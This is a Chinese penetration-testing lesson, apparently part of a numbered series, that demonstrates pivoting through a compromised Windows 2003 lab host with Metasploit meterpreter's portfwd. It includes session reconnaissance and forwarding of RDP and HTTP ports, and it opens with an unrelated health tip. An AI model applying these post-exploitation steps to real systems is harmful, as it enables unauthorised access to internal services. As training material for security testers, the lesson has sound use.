注:请多喝点热水或者凉白开,可预防肾结石,通风等。
    痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。

    portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4—IPV6的转换转发。并且内置于meterpreter。其中exe单版本源码如下:

    https://github.com/rssnsj/portfwd

    攻击机:
    192.168.1.5 Debian

    靶机:
    192.168.1.4 Windows 7
    192.168.1.119 Windows 2003

    1. msf exploit(multi/handler) \> sessions l
    2. Active sessions
    3. ===============
    4. Id Name Type Information Connection
    5. ‐‐ ‐‐‐‐ ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐
    6. 1 meterpreter x86/windows WIN03X64\Administrator @ WIN03X64 192.168.1.5:45303 ‐> 192.168.1.119:53 (192.168.1.119)
    7. msf exploit(multi/handler) > sessions i 1 c 'ipconfig'
    8. [*] Running 'ipconfig' on meterpreter session 1 (192.168.1.119)
    9. Windows IP Configuration
    10. Ethernet adapter 本地连接:
    11. Connectionspecific DNS Suffix . :
    12. IP Address. . . . . . . . . . . . : 192.168.1.119
    13. Subnet Mask . . . . . . . . . . . : 255.255.255.0
    14. Default Gateway . . . . . . . . . : 192.168.1.1 22

    第九十五课:基于Portfwd端口转发 - 图1

    靶机IP为:
    192.168.1.119—-windows 2003—-x64

    需要转发端口为:80,3389

    1. msf exploit(multi/handler) > sessions i 1
    2. [*] Starting interaction with 1...
    3. meterpreter > shell
    4. Process 4012 created.
    5. Channel 56 created.
    6. Microsoft Windows [版本 5.2.3790]
    7. (C) 版权所有 19852003 Microsoft Corp.
    8. C:\Documents and Settings\Administrator\桌面>if defined PSModulePath (echo ok!) else (echo sorry!)
    9. if defined PSModulePath (echo ok!) else (echo sorry!)
    10. sorry!
    11. C:\Documents and Settings\Administrator\桌面>net config Workstation
    12. net config Workstation
    13. 计算机名 \\WIN03X64
    14. 计算机全名 win03x64
    15. 用户名 Administrator
    16. 工作站正运行于
    17. NetbiosSmb (000000000000)
    18. NetBT_Tcpip_{37C12280A19D4D1A93656CBF2CAE5B07} (000C2985D67D)
    19. 软件版本 Microsoft Windows Server 2003
    20. 工作站域 WORKGROUP
    21. 登录域 WIN03X64
    22. COM 打开超时 (秒) 0
    23. COM 发送计数 (字节) 16
    24. COM 发送超时 (毫秒) 250
    25. 命令成功完成。
    26. C:\Documents and Settings\Administrator\桌面>netstat an|findstr "LIST ENING"
    27. netstat an|findstr "LISTENING"
    28. TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
    29. TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
    30. TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
    31. TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
    32. TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING
    33. TCP 0.0.0.0:3078 0.0.0.0:0 LISTENING
    34. TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
    35. TCP 0.0.0.0:9001 0.0.0.0:0 LISTENING
    36. TCP 127.0.0.1:2995 0.0.0.0:0 LISTENING
    37. TCP 127.0.0.1:9000 0.0.0.0:0 LISTENING
    38. TCP 127.0.0.1:9999 0.0.0.0:0 LISTENING
    39. TCP 192.168.1.119:139 0.0.0.0:0 LISTENING

    第九十五课:基于Portfwd端口转发 - 图2

    1. meterpreter > portfwd h
    2. Usage: portfwd [‐h] [add | delete | list | flush] [args]
    3. OPTIONS:
    4. L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
    5. R Indicates a reverse port forward.
    6. h Help banner.
    7. i <opt> Index of the port forward entry to interact with (see the "list" command).
    8. l <opt> Forward: local port to listen on. Reverse: local port to connect to.
    9. p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
    10. r <opt> Forward: remote host to connect to.

    第九十五课:基于Portfwd端口转发 - 图3

    攻击机执行:

    1. meterpreter > portfwd add l 33389 r 192.168.1.119 p 3389
    2. [*] Local TCP relay created: :33389 <‐> 192.168.1.119:3389
    3. meterpreter > portfwd add l 30080 r 192.168.1.119 p 80
    4. [*] Local TCP relay created: :30080 <‐> 192.168.1.119:80
    5. meterpreter > portfwd
    6. Active Port Forwards
    7. ====================
    8. Index Local Remote Direction
    9. ‐‐‐‐‐ ‐‐‐‐‐ ‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐
    10. 1 0.0.0.0:33389 192.168.1.119:3389 Forward
    11. 2 0.0.0.0:30080 192.168.1.119:80 Forward
    12. 2 total active port forwards.

    第九十五课:基于Portfwd端口转发 - 图4

    第九十五课:基于Portfwd端口转发 - 图5

    查看攻击机LISTEN端口:转发已成功

    1. root@John:~# netstat ntlp |grep :3
    2. tcp 0 0 0.0.0.0:33389 0.0.0.0:* LISTEN 2319/ruby
    3. tcp 0 0 0.0.0.0:30080 0.0.0.0:* LISTEN 2319/ruby 4

    第九十五课:基于Portfwd端口转发 - 图6

    Windows 7 分别访问攻击机33389,30080,既等价访问靶机3389,80

    第九十五课:基于Portfwd端口转发 - 图7

    第九十五课:基于Portfwd端口转发 - 图8

    Micropoor